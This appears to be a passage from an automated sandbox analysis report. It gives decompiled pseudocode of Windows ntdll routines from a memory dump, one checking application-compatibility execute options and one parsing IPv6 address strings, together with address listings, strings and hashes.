                                                                                                                                                                                                              					E008A3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                                                                                                                                                                                              					_t71 = 0x214;
                                                                                                                                                                                                              					_v544 = 0x214;
                                                                                                                                                                                                              					E0085DFC0( &_v540, 0, 0x214);
                                                                                                                                                                                                              					_t75 = _t74 + 0x20;
                                                                                                                                                                                                              					_t46 =  *0x934218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                                                                                                                                                                                              					__eflags = _t46;
                                                                                                                                                                                                              					if(_t46 == 0) {
                                                                                                                                                                                                              						goto L1;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_t47 = _v544;
                                                                                                                                                                                                              					__eflags = _t47;
                                                                                                                                                                                                              					if(_t47 == 0) {
                                                                                                                                                                                                              						goto L1;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					__eflags = _t47 - 0x214;
                                                                                                                                                                                                              					if(_t47 >= 0x214) {
                                                                                                                                                                                                              						goto L1;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_push(_t62);
                                                                                                                                                                                                              					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                                                                                                                                                                                              					E008A3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                                                                                                                                                                                              					_t52 = E00860D27( &_v540, L"Execute=1");
                                                                                                                                                                                                              					_t76 = _t75 + 0x1c;
                                                                                                                                                                                                              					_push(_t62);
                                                                                                                                                                                                              					__eflags = _t52;
                                                                                                                                                                                                              					if(_t52 == 0) {
                                                                                                                                                                                                              						E008A3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                                                                                                                                                                                              						_t71 =  &_v540;
                                                                                                                                                                                                              						_t56 = _t73 + _v544 - 0x218;
                                                                                                                                                                                                              						_t77 = _t76 + 0x14;
                                                                                                                                                                                                              						_v552 = _t56;
                                                                                                                                                                                                              						__eflags = _t71 - _t56;
                                                                                                                                                                                                              						if(_t71 >= _t56) {
                                                                                                                                                                                                              							goto L1;
                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                              							goto L10;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						while(1) {
                                                                                                                                                                                                              							L10:
                                                                                                                                                                                                              							_t62 = E00868375(_t71, 0x20);
                                                                                                                                                                                                              							_pop(_t69);
                                                                                                                                                                                                              							__eflags = _t62;
                                                                                                                                                                                                              							if(__eflags != 0) {
                                                                                                                                                                                                              								__eflags = 0;
                                                                                                                                                                                                              								 *_t62 = 0;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							E008A3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                                                                                                                                                                                              							_t77 = _t77 + 0x10;
                                                                                                                                                                                                              							E008CE8DB(_t69, _t70, __eflags, _t72, _t71);
                                                                                                                                                                                                              							__eflags = _t62;
                                                                                                                                                                                                              							if(_t62 == 0) {
                                                                                                                                                                                                              								goto L1;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_t31 = _t62 + 2; // 0x2
                                                                                                                                                                                                              							_t71 = _t31;
                                                                                                                                                                                                              							__eflags = _t71 - _v552;
                                                                                                                                                                                                              							if(_t71 >= _v552) {
                                                                                                                                                                                                              								goto L1;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                                                                                                                                                                              					_push(3);
                                                                                                                                                                                                              					_push(0x55);
                                                                                                                                                                                                              					E008A3F92();
                                                                                                                                                                                                              					_t38 = 1;
                                                                                                                                                                                                              					L2:
                                                                                                                                                                                                              					return E0085E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				L1:
                                                                                                                                                                                                              				_t38 = 0;
                                                                                                                                                                                                              				goto L2;
                                                                                                                                                                                                              			}



























                                                                                                                                                                                                              0x00887f08
                                                                                                                                                                                                              0x00887f0f
                                                                                                                                                                                                              0x00887f12
                                                                                                                                                                                                              0x00887f1b
                                                                                                                                                                                                              0x00887f31
                                                                                                                                                                                                              0x008a3ead
                                                                                                                                                                                                              0x008a3eb4
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008a3eba
                                                                                                                                                                                                              0x008a3ecd
                                                                                                                                                                                                              0x008a3ed2
                                                                                                                                                                                                              0x008a3ee1
                                                                                                                                                                                                              0x008a3ee7
                                                                                                                                                                                                              0x008a3eec
                                                                                                                                                                                                              0x008a3f12
                                                                                                                                                                                                              0x008a3f18
                                                                                                                                                                                                              0x008a3f1a
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008a3f20
                                                                                                                                                                                                              0x008a3f26
                                                                                                                                                                                                              0x008a3f28
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008a3f2e
                                                                                                                                                                                                              0x008a3f30
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008a3f3a
                                                                                                                                                                                                              0x008a3f3b
                                                                                                                                                                                                              0x008a3f53
                                                                                                                                                                                                              0x008a3f64
                                                                                                                                                                                                              0x008a3f69
                                                                                                                                                                                                              0x008a3f6c
                                                                                                                                                                                                              0x008a3f6d
                                                                                                                                                                                                              0x008a3f6f
                                                                                                                                                                                                              0x008ae304
                                                                                                                                                                                                              0x008ae30f
                                                                                                                                                                                                              0x008ae315
                                                                                                                                                                                                              0x008ae31e
                                                                                                                                                                                                              0x008ae321
                                                                                                                                                                                                              0x008ae327
                                                                                                                                                                                                              0x008ae329
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008ae32f
                                                                                                                                                                                                              0x008ae32f
                                                                                                                                                                                                              0x008ae337
                                                                                                                                                                                                              0x008ae33a
                                                                                                                                                                                                              0x008ae33b
                                                                                                                                                                                                              0x008ae33d
                                                                                                                                                                                                              0x008ae33f
                                                                                                                                                                                                              0x008ae341
                                                                                                                                                                                                              0x008ae341
                                                                                                                                                                                                              0x008ae34e
                                                                                                                                                                                                              0x008ae353
                                                                                                                                                                                                              0x008ae358
                                                                                                                                                                                                              0x008ae35d
                                                                                                                                                                                                              0x008ae35f
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008ae365
                                                                                                                                                                                                              0x008ae365
                                                                                                                                                                                                              0x008ae368
                                                                                                                                                                                                              0x008ae36e
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008ae374
                                                                                                                                                                                                              0x008ae32f
                                                                                                                                                                                                              0x008a3f75
                                                                                                                                                                                                              0x008a3f7a
                                                                                                                                                                                                              0x008a3f7c
                                                                                                                                                                                                              0x008a3f7e
                                                                                                                                                                                                              0x008a3f86
                                                                                                                                                                                                              0x00887f39
                                                                                                                                                                                                              0x00887f47
                                                                                                                                                                                                              0x00887f47
                                                                                                                                                                                                              0x00887f37
                                                                                                                                                                                                              0x00887f37
                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 008A3F12
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 008A3EC4
                                                                                                                                                                                                              • Execute=1, xrefs: 008A3F5E
                                                                                                                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 008AE2FB
                                                                                                                                                                                                              • ExecuteOptions, xrefs: 008A3F04
                                                                                                                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 008A3F4A
                                                                                                                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 008A3F75
                                                                                                                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 008AE345
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380521545.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380516990.0000000000830000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380618624.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380622848.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380627068.0000000000934000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380632555.0000000000937000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380636597.0000000000940000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380671187.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: BaseDataModuleQuery
                                                                                                                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                                              • API String ID: 3901378454-484625025
                                                                                                                                                                                                              • Opcode ID: a889663e29e480a8d7585baa700ec22e8e1802243ea4249e0ed5a5ec47c21d24
                                                                                                                                                                                                              • Instruction ID: bed972a14b8c34c156e0a6a0fdd92c5559f5f8cb9ee1abec0e68ee149453483b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a889663e29e480a8d7585baa700ec22e8e1802243ea4249e0ed5a5ec47c21d24
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2241D731A8060D7ADF20EA94DCC6FDA73BCFB15705F1405A9B605E6181EE70DB498F61
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                              			E00890B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                              				signed int _v12;
                                                                                                                                                                                                              				signed int _v16;
                                                                                                                                                                                                              				signed int _v20;
                                                                                                                                                                                                              				signed int _v24;
                                                                                                                                                                                                              				signed int _v28;
                                                                                                                                                                                                              				signed int _v32;
                                                                                                                                                                                                              				void* _t108;
                                                                                                                                                                                                              				void* _t116;
                                                                                                                                                                                                              				char _t120;
                                                                                                                                                                                                              				short _t121;
                                                                                                                                                                                                              				void* _t128;
                                                                                                                                                                                                              				intOrPtr* _t130;
                                                                                                                                                                                                              				char _t132;
                                                                                                                                                                                                              				short _t133;
                                                                                                                                                                                                              				intOrPtr _t141;
                                                                                                                                                                                                              				signed int _t156;
                                                                                                                                                                                                              				signed int _t174;
                                                                                                                                                                                                              				intOrPtr _t177;
                                                                                                                                                                                                              				intOrPtr* _t179;
                                                                                                                                                                                                              				intOrPtr _t180;
                                                                                                                                                                                                              				void* _t183;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t179 = _a4;
                                                                                                                                                                                                              				_t141 =  *_t179;
                                                                                                                                                                                                              				_v16 = 0;
                                                                                                                                                                                                              				_v28 = 0;
                                                                                                                                                                                                              				_v8 = 0;
                                                                                                                                                                                                              				_v24 = 0;
                                                                                                                                                                                                              				_v12 = 0;
                                                                                                                                                                                                              				_v32 = 0;
                                                                                                                                                                                                              				_v20 = 0;
                                                                                                                                                                                                              				if(_t141 == 0) {
                                                                                                                                                                                                              					L41:
                                                                                                                                                                                                              					 *_a8 = _t179;
                                                                                                                                                                                                              					_t180 = _v24;
                                                                                                                                                                                                              					if(_t180 != 0) {
                                                                                                                                                                                                              						if(_t180 != 3) {
                                                                                                                                                                                                              							goto L6;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						_v8 = _v8 + 1;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_t174 = _v32;
                                                                                                                                                                                                              					if(_t174 == 0) {
                                                                                                                                                                                                              						if(_v8 == 7) {
                                                                                                                                                                                                              							goto L43;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						goto L6;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					L43:
                                                                                                                                                                                                              					if(_v16 != 1) {
                                                                                                                                                                                                              						if(_v16 != 2) {
                                                                                                                                                                                                              							goto L6;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                                                                                                                                              						L47:
                                                                                                                                                                                                              						if(_t174 != 0) {
                                                                                                                                                                                                              							E00868980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                                                                                                                                                                                              							_t116 = 8;
                                                                                                                                                                                                              							E0085DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						return 0;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					if(_t180 != 0) {
                                                                                                                                                                                                              						if(_v12 > 3) {
                                                                                                                                                                                                              							goto L6;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						_t120 = E00890CFA(_v28, 0, 0xa);
                                                                                                                                                                                                              						_t183 = _t183 + 0xc;
                                                                                                                                                                                                              						if(_t120 > 0xff) {
                                                                                                                                                                                                              							goto L6;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                                                                                                                                                                                              						goto L47;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					if(_v12 > 4) {
                                                                                                                                                                                                              						goto L6;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_t121 = E00890CFA(_v28, _t180, 0x10);
                                                                                                                                                                                                              					_t183 = _t183 + 0xc;
                                                                                                                                                                                                              					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                                                                                                                                                                                              					goto L47;
                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                              					while(1) {
                                                                                                                                                                                                              						_t123 = _v16;
                                                                                                                                                                                                              						if(_t123 == 0) {
                                                                                                                                                                                                              							goto L7;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						_t108 = _t123 - 1;
                                                                                                                                                                                                              						if(_t108 != 0) {
                                                                                                                                                                                                              							goto L1;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						_t178 = _t141;
                                                                                                                                                                                                              						if(E008906BA(_t108, _t141) == 0 || _t135 == 0) {
                                                                                                                                                                                                              							if(E008906BA(_t135, _t178) == 0 || E00890A5B(_t136, _t178) == 0) {
                                                                                                                                                                                                              								if(_t141 != 0x3a) {
                                                                                                                                                                                                              									if(_t141 == 0x2e) {
                                                                                                                                                                                                              										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                                                                                                                                                                                              											goto L41;
                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                              											_v24 = _v24 + 1;
                                                                                                                                                                                                              											L27:
                                                                                                                                                                                                              											_v16 = _v16 & 0x00000000;
                                                                                                                                                                                                              											L28:
                                                                                                                                                                                                              											if(_v28 == 0) {
                                                                                                                                                                                                              												goto L20;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											_t177 = _v24;
                                                                                                                                                                                                              											if(_t177 != 0) {
                                                                                                                                                                                                              												if(_v12 > 3) {
                                                                                                                                                                                                              													L6:
                                                                                                                                                                                                              													return 0xc000000d;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												_t132 = E00890CFA(_v28, 0, 0xa);
                                                                                                                                                                                                              												_t183 = _t183 + 0xc;
                                                                                                                                                                                                              												if(_t132 > 0xff) {
                                                                                                                                                                                                              													goto L6;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                                                                                                                                                                                              												goto L20;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											if(_v12 > 4) {
                                                                                                                                                                                                              												goto L6;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											_t133 = E00890CFA(_v28, 0, 0x10);
                                                                                                                                                                                                              											_t183 = _t183 + 0xc;
                                                                                                                                                                                                              											_v20 = _v20 + 1;
                                                                                                                                                                                                              											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                                                                                                                                                                                              											goto L20;
                                                                                                                                                                                                              										}
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									goto L41;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								if(_v24 > 0 || _v8 > 6) {
                                                                                                                                                                                                              									goto L41;
                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                              									_t130 = _t179 + 1;
                                                                                                                                                                                                              									if( *_t130 == _t141) {
                                                                                                                                                                                                              										if(_v32 != 0) {
                                                                                                                                                                                                              											goto L41;
                                                                                                                                                                                                              										}
                                                                                                                                                                                                              										_v32 = _v8 + 1;
                                                                                                                                                                                                              										_t156 = 2;
                                                                                                                                                                                                              										_v8 = _v8 + _t156;
                                                                                                                                                                                                              										L34:
                                                                                                                                                                                                              										_t179 = _t130;
                                                                                                                                                                                                              										_v16 = _t156;
                                                                                                                                                                                                              										goto L28;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									_v8 = _v8 + 1;
                                                                                                                                                                                                              									goto L27;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								_v12 = _v12 + 1;
                                                                                                                                                                                                              								if(_v24 > 0) {
                                                                                                                                                                                                              									goto L41;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								_a7 = 1;
                                                                                                                                                                                                              								goto L20;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                              							_v12 = _v12 + 1;
                                                                                                                                                                                                              							L20:
                                                                                                                                                                                                              							_t179 = _t179 + 1;
                                                                                                                                                                                                              							_t141 =  *_t179;
                                                                                                                                                                                                              							if(_t141 == 0) {
                                                                                                                                                                                                              								goto L41;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							continue;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						L7:
                                                                                                                                                                                                              						if(_t141 == 0x3a) {
                                                                                                                                                                                                              							if(_v24 > 0 || _v8 > 0) {
                                                                                                                                                                                                              								goto L41;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								_t130 = _t179 + 1;
                                                                                                                                                                                                              								if( *_t130 != _t141) {
                                                                                                                                                                                                              									goto L41;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								_v20 = _v20 + 1;
                                                                                                                                                                                                              								_t156 = 2;
                                                                                                                                                                                                              								_v32 = 1;
                                                                                                                                                                                                              								_v8 = _t156;
                                                                                                                                                                                                              								 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                                                                                                                                              								goto L34;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						L8:
                                                                                                                                                                                                              						if(_v8 > 7) {
                                                                                                                                                                                                              							goto L41;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						_t142 = _t141;
                                                                                                                                                                                                              						if(E008906BA(_t123, _t141) == 0 || _t124 == 0) {
                                                                                                                                                                                                              							if(E008906BA(_t124, _t142) == 0 || E00890A5B(_t125, _t142) == 0 || _v24 > 0) {
                                                                                                                                                                                                              								goto L41;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								_t128 = 1;
                                                                                                                                                                                                              								_a7 = 1;
                                                                                                                                                                                                              								_v28 = _t179;
                                                                                                                                                                                                              								_v16 = 1;
                                                                                                                                                                                                              								_v12 = 1;
                                                                                                                                                                                                              								L39:
                                                                                                                                                                                                              								if(_v16 == _t128) {
                                                                                                                                                                                                              									goto L20;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								goto L28;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                              							_a7 = 0;
                                                                                                                                                                                                              							_v28 = _t179;
                                                                                                                                                                                                              							_v16 = 1;
                                                                                                                                                                                                              							_v12 = 1;
                                                                                                                                                                                                              							goto L20;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				L1:
                                                                                                                                                                                                              				_t123 = _t108 == 1;
                                                                                                                                                                                                              				if(_t108 == 1) {
                                                                                                                                                                                                              					goto L8;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				_t128 = 1;
                                                                                                                                                                                                              				goto L39;
                                                                                                                                                                                                              			}

























                                                                                                                                                                                                              0x00890b21
                                                                                                                                                                                                              0x00890b24
                                                                                                                                                                                                              0x00890b27
                                                                                                                                                                                                              0x00890b2a
                                                                                                                                                                                                              0x00890b2d
                                                                                                                                                                                                              0x00890b30
                                                                                                                                                                                                              0x00890b33
                                                                                                                                                                                                              0x00890b36
                                                                                                                                                                                                              0x00890b39
                                                                                                                                                                                                              0x00890b3e
                                                                                                                                                                                                              0x00890c65
                                                                                                                                                                                                              0x00890c68
                                                                                                                                                                                                              0x00890c6a
                                                                                                                                                                                                              0x00890c6f
                                                                                                                                                                                                              0x008beb42
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008beb48
                                                                                                                                                                                                              0x008beb48
                                                                                                                                                                                                              0x00890c75
                                                                                                                                                                                                              0x00890c7a
                                                                                                                                                                                                              0x008beb54
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008beb5a
                                                                                                                                                                                                              0x00890c80
                                                                                                                                                                                                              0x00890c84
                                                                                                                                                                                                              0x008beb98
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008beba6
                                                                                                                                                                                                              0x00890cb8
                                                                                                                                                                                                              0x00890cba
                                                                                                                                                                                                              0x00890cd3
                                                                                                                                                                                                              0x00890cda
                                                                                                                                                                                                              0x00890ce4
                                                                                                                                                                                                              0x00890ce9
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00890cec
                                                                                                                                                                                                              0x00890c8c
                                                                                                                                                                                                              0x008beb63
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008beb70
                                                                                                                                                                                                              0x008beb75
                                                                                                                                                                                                              0x008beb7d
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008beb8c
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008beb8c
                                                                                                                                                                                                              0x00890c96
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00890ca2
                                                                                                                                                                                                              0x00890cac
                                                                                                                                                                                                              0x00890cb4
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00890b44
                                                                                                                                                                                                              0x00890b47
                                                                                                                                                                                                              0x00890b49
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00890b4f
                                                                                                                                                                                                              0x00890b50
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00890b56
                                                                                                                                                                                                              0x00890b62
                                                                                                                                                                                                              0x00890b7c
                                                                                                                                                                                                              0x00890bac
                                                                                                                                                                                                              0x00890a0f
                                                                                                                                                                                                              0x008beaaa
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008beac4
                                                                                                                                                                                                              0x008beac4
                                                                                                                                                                                                              0x00890bd0
                                                                                                                                                                                                              0x00890bd0
                                                                                                                                                                                                              0x00890bd4
                                                                                                                                                                                                              0x00890bd9
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00890bdb
                                                                                                                                                                                                              0x00890be0
                                                                                                                                                                                                              0x008beb0e
                                                                                                                                                                                                              0x00890a1a
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00890a1a
                                                                                                                                                                                                              0x008beb1a
                                                                                                                                                                                                              0x008beb1f
                                                                                                                                                                                                              0x008beb27
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008beb36
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008beb36
                                                                                                                                                                                                              0x00890bea
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00890bf6
                                                                                                                                                                                                              0x00890c00
                                                                                                                                                                                                              0x00890c03
                                                                                                                                                                                                              0x00890c0b
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00890c0b
                                                                                                                                                                                                              0x008beaaa
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00890a15
                                                                                                                                                                                                              0x00890bb6
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00890bc6
                                                                                                                                                                                                              0x00890bc6
                                                                                                                                                                                                              0x00890bcb
                                                                                                                                                                                                              0x00890c15
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00890c1d
                                                                                                                                                                                                              0x00890c20
                                                                                                                                                                                                              0x00890c21
                                                                                                                                                                                                              0x00890c24
                                                                                                                                                                                                              0x00890c24
                                                                                                                                                                                                              0x00890c26
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00890c26
                                                                                                                                                                                                              0x00890bcd
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00890bcd
                                                                                                                                                                                                              0x00890b89
                                                                                                                                                                                                              0x00890b89
                                                                                                                                                                                                              0x00890b90
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00890b96
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00890b96
                                                                                                                                                                                                              0x00890a04
                                                                                                                                                                                                              0x00890a04
                                                                                                                                                                                                              0x00890b9a
                                                                                                                                                                                                              0x00890b9a
                                                                                                                                                                                                              0x00890b9b
                                                                                                                                                                                                              0x00890b9f
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00890ba5
                                                                                                                                                                                                              0x00890ac7
                                                                                                                                                                                                              0x00890aca
                                                                                                                                                                                                              0x008beacf
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008beade
                                                                                                                                                                                                              0x008beade
                                                                                                                                                                                                              0x008beae3
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008beaf3
                                                                                                                                                                                                              0x008beaf6
                                                                                                                                                                                                              0x008beaf7
                                                                                                                                                                                                              0x008beafe
                                                                                                                                                                                                              0x008beb01
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008beb01
                                                                                                                                                                                                              0x008beacf
                                                                                                                                                                                                              0x00890ad0
                                                                                                                                                                                                              0x00890ad4
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00890ada
                                                                                                                                                                                                              0x00890ae6
                                                                                                                                                                                                              0x00890c34
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00890c47
                                                                                                                                                                                                              0x00890c49
                                                                                                                                                                                                              0x00890c4a
                                                                                                                                                                                                              0x00890c4e
                                                                                                                                                                                                              0x00890c51
                                                                                                                                                                                                              0x00890c54
                                                                                                                                                                                                              0x00890c57
                                                                                                                                                                                                              0x00890c5a
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00890c60
                                                                                                                                                                                                              0x00890afb
                                                                                                                                                                                                              0x00890afe
                                                                                                                                                                                                              0x00890b02
                                                                                                                                                                                                              0x00890b05
                                                                                                                                                                                                              0x00890b08
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00890b08
                                                                                                                                                                                                              0x00890ae6
                                                                                                                                                                                                              0x00890b44
                                                                                                                                                                                                              0x008909f8
                                                                                                                                                                                                              0x008909f8
                                                                                                                                                                                                              0x008909f9
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008beaa0
                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380521545.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380516990.0000000000830000.00000040.00000001.sdmp Download File
